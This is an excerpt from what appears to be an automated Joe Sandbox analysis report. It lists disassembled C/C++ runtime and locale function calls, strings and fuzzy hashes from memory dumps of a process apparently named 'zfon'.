                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C312
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B4C32E
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C337
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C354
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B4C370
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B4C385
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B4C31D
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B4C35F
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B4C37E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 2460671452-35662545
                                                                                                                                                                            • Opcode ID: 0820c1a4a04c52d0eb239fbab98a74cf88671c412056eb74643d8d24ad950682
                                                                                                                                                                            • Instruction ID: 309469ce96e54e5130fbadbff707af1da70a682dbcaf40866873601ad8960fca
                                                                                                                                                                            • Opcode Fuzzy Hash: 0820c1a4a04c52d0eb239fbab98a74cf88671c412056eb74643d8d24ad950682
                                                                                                                                                                            • Instruction Fuzzy Hash: 6B21816AA04F4186EB00DF31E5402BA73A1FB98F94F849135DA4D63756DF3CE591C790
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$cef_string_map_allocmallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 940974311-0
                                                                                                                                                                            • Opcode ID: 33a35221359f596db583780524ca83e01fac178137d3890bcdf752d64281db90
                                                                                                                                                                            • Instruction ID: 169fd32ca8bb94dab882f419cc21b43495563b17fe5f0f6d2702a8bd7e8c3dcf
                                                                                                                                                                            • Opcode Fuzzy Hash: 33a35221359f596db583780524ca83e01fac178137d3890bcdf752d64281db90
                                                                                                                                                                            • Instruction Fuzzy Hash: 12A18D62B08A4685EF20EB75D4943BCA7B2FB45B98F848935CE1E17B98DF38D444C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1019560052-0
                                                                                                                                                                            • Opcode ID: 1f5262a16c04021e3a90f13f385dbb394579881b511105779db3e6e7012f87b8
                                                                                                                                                                            • Instruction ID: ce672fb0a317b63a09e92b1efc4f89dd81372fdce8c099ea4b523d1500923612
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f5262a16c04021e3a90f13f385dbb394579881b511105779db3e6e7012f87b8
                                                                                                                                                                            • Instruction Fuzzy Hash: B681D163B48A4685EF24EB75D4503BCA7B2AB44BE8F549A35DE2E17BD4DE38D4018320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharCompareMultiStringWide__crt$freemalloc$__strncnt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 525835285-0
                                                                                                                                                                            • Opcode ID: f6e00a47ca206d7a4e1b7c1a66c0737e84cf9e0c9f132774600d41b7bf988ede
                                                                                                                                                                            • Instruction ID: 9dfe03e7a6ace2089492d3919a71a005c2b1e83b388795cbc83e86043aedb436
                                                                                                                                                                            • Opcode Fuzzy Hash: f6e00a47ca206d7a4e1b7c1a66c0737e84cf9e0c9f132774600d41b7bf988ede
                                                                                                                                                                            • Instruction Fuzzy Hash: CA7190BAA0874286EB248F35D84077A6391FF48BE8F945335DA1D63BD4DF3CE4158A00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                            • Opcode ID: 7b5661194ffe89ce305229f5119f63caed1cb30a475ffb1c0b7852583c735bf0
                                                                                                                                                                            • Instruction ID: 9b40be40e79edf506a34a2260546c711097d6d42ca4d39bcff96e50c298e150a
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b5661194ffe89ce305229f5119f63caed1cb30a475ffb1c0b7852583c735bf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 297150B6B14A869DEB10DFB0D4802ED33B1EB4478CB516431DE0D67A99DF34D619CB80
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 5079871919eeef31b104849c91ea34eddbb498ae389773a60f034b0124e3a6ee
                                                                                                                                                                            • Instruction ID: 9fcfcec4d4a715ac6f8f791b831ee48edef661a58cb1d26b87aef95980ec019a
                                                                                                                                                                            • Opcode Fuzzy Hash: 5079871919eeef31b104849c91ea34eddbb498ae389773a60f034b0124e3a6ee
                                                                                                                                                                            • Instruction Fuzzy Hash: E491D4BAA08E0682EF14CF28D4413BA6760FB84F85F446035DA0E637A4DF3DE855CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B368F7
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B3698F
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B369A1
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B369D6
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B369E4
                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B36A4C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memchrtolower$_errnoisspace
                                                                                                                                                                            • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                            • API String ID: 3508154992-2432849056
                                                                                                                                                                            • Opcode ID: 52be6e07b037d6f09550230747a39371e924b433e1c7da1dee62df230f17126e
                                                                                                                                                                            • Instruction ID: 39842d90c43b6a22584cf604a7d8c434dd41395b780f2be20f5da70627f6bcfa
                                                                                                                                                                            • Opcode Fuzzy Hash: 52be6e07b037d6f09550230747a39371e924b433e1c7da1dee62df230f17126e
                                                                                                                                                                            • Instruction Fuzzy Hash: B2510A9AE0C7C345E7219F30E8543BB6B90BB49B74F586131CA8D62395DE3CA6678B10
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36ADC
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36B76
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36B88
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36BBB
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36BC9
                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36C27
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memchrtolower$_errnoisspace
                                                                                                                                                                            • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                            • API String ID: 3508154992-2432849056
                                                                                                                                                                            • Opcode ID: 43815465dc66ac9b27d3f1ae7d633b0096f14b933a58eda5914f7ac150fdf0fb
                                                                                                                                                                            • Instruction ID: c4587145ce0652f666d2e9738115a3e71b812164ad23f30d75fd228030d8fa1d
                                                                                                                                                                            • Opcode Fuzzy Hash: 43815465dc66ac9b27d3f1ae7d633b0096f14b933a58eda5914f7ac150fdf0fb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D512999E0C78345FB258F35E55537B6790AB44B74FD86030CA5D52690EE3CE6638F10
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                            • API String ID: 2943138195-1464470183
                                                                                                                                                                            • Opcode ID: 056f7ce24c9a02fb08967ba7ebef161081805b5f1a36d64d6cbfd7b45a579add
                                                                                                                                                                            • Instruction ID: 7a4c0737a3aea4b1e188af89579097ecfb37a629c9d2c0fb190450bb5e614406
                                                                                                                                                                            • Opcode Fuzzy Hash: 056f7ce24c9a02fb08967ba7ebef161081805b5f1a36d64d6cbfd7b45a579add
                                                                                                                                                                            • Instruction Fuzzy Hash: B6515CBAE1869289FB10CF74E8806BE37B1BB04344F616535DA0D67B98EF38E555CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B55A60
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B55AE7
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55B26
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55B40
                                                                                                                                                                            • _Getvals.LIBCPMT ref: 00007FFBC1B55C3A
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B55C41
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: ,$false$true
                                                                                                                                                                            • API String ID: 2135902765-760133229
                                                                                                                                                                            • Opcode ID: 67ee8f4e636e21bca307c7727e2474fd631be0ead37d0a99a3418088d2fddda1
                                                                                                                                                                            • Instruction ID: 4fd0b63b14d52bf0bfcd3c0d2b33c0868d0ce5e049b4dac9d83fc0b8a20bc9b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 67ee8f4e636e21bca307c7727e2474fd631be0ead37d0a99a3418088d2fddda1
                                                                                                                                                                            • Instruction Fuzzy Hash: 59517E66518BC182E761CF31E5402ABB7A4FB89760F446226EB9E13665DF3CE185CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B455E3
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4563B
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4567A
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B456B4
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B45712
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B45718
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B4571D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_taskcalloc$ExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                            • API String ID: 2349454547-2658103896
                                                                                                                                                                            • Opcode ID: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                                                                                            • Instruction ID: 1761da96566171369bfcec1a9a79af159c800f20dad300c1e05e7f8caf8ecf74
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
